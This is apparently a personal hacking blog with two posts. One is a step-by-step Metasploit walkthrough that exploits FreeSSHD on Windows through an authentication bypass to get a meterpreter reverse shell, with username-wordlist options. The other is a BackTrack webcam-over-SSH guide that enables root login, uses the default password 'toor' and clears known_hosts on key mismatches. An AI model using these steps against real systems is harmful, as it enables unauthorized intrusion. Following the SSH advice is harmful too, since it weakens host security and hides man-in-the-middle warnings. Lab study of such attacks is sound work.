Top
JohnKlann / BackTrack

Kali Linux: Hacking FreeSSHD on Windows to get a meterpreter shell

So I found and interesting exploit in metasploit today mainly out of boredom and I figured I would share here. Below you will find a step my step of how to use metasploit to exploit FreeSSHD on windows to get a meterpreter shell.

start: FreeSSHD on your windows Victim box and check for any custom ports.

freesshd_configurations

freesshd_configurations

start: mfsconsole in kali

msfconsole

msfconsole

search: ssh

search_ssh

search_ssh

copy: exploit/windows/ssh/freesshd_authbypass

run: use exploit/windows/ssh/freesshd_authbypass

run: show options

use_exploit_options

use_exploit_options

run: set RHOST [victim ip]

run: set RPORT [victim port running ssh]

run: set LHOST [host ip]

run: set LPORT [local listening port]

exploit_settings

exploit_settings

run: exploit

exploit_shell

exploit_shell

Note: This exploit uses a user name list for the attack if the user that the ssh service uses to authenticate is not in this list this exploit won’t work. However there is an option you can set if you know the username or wish to guess at it.

ex: set USERNAME crazy_user123456789

Note: Also you can always find larger user name lists and add them to the list that metasploit uses located at “/opt/metasploit/apps/pro/msf3/data/wordlists/unix_users.txt” or you can change this path to point at your own list using the

ex: set USER_FILE /youpath/users.txt

Note: Kali of course has built in wordlist which you can find at the following location

ex: usr/share/dirbuster/wordlists/

Note: Once the exploit works you have a meterpreter shell :)

Solution if you are trying to protect against this attack, use a complicated username or use cygwin sshd for windows operating systems instead.

jklann

How to Stream a Webcam through SSH with VLC on Backtrack 5 R3 Gnome 32

 

You will want to perform Steps 1 and 2 on both the server and the client.
Step 1: Install VLC and Fix it for Backtrack 5 

apt-get install vlc

hexedit /usr/bin/vlc

Press tab

replace geteuid._libc_start_main with getppid._libc_start_main

ctrl+x

y

vlc “and it should now work”


Step 2: Setting up ssh “if you have never used it”

nano /etc/ssh/sshd_config

Add the following Lines or un-comment them if they are already there.

PermitRootLogin yes
UsePrivilegeSeparation yes


X11Forwarding yes
X11DisplayOffset 10
TCPKeepAlive yes


UsePAM yes

If you have not used ssh before you will need to generate keys run commands below:

ssh-keygen
Enter file in which to save the key (/root/.ssh/id_rsa):
/etc/ssh/ssh_host_rsa_key
password:
re-enter:

ssh-keygen
Enter file in which to save the key (/root/.ssh/id_rsa):
/etc/ssh/ssh_host_dsa_key
password:
re-enter:

Step 3: Now you will need to start ssh by running the command below:

start ssh

Step 4: Now that everything is setup lets start the webcam stream:

ssh -C -X root@serverip -L 9091:localhost:9091
password:
“backtrack’s default is: toor”

Note: If you get an error about the SSH keys not matching.

gedit /root/.ssh/known_hosts

Then delete everything and save the file.

Then run the command below:

vlc v4l2:// :v4l2-dev=/dev/video0 :v4l2-adev=/dev/dsp :v4l2-standard=0 :sout="#transcode{vcodec=mp4v,vb=800,scale=1,acodec=mpga,ab=128, channels=2}:duplicate{dst=std{access=http,mux=ts,dst=localhost:9091}}"

Now open a new terminal and run this command:

vlc http://localhost:9091

 


jklann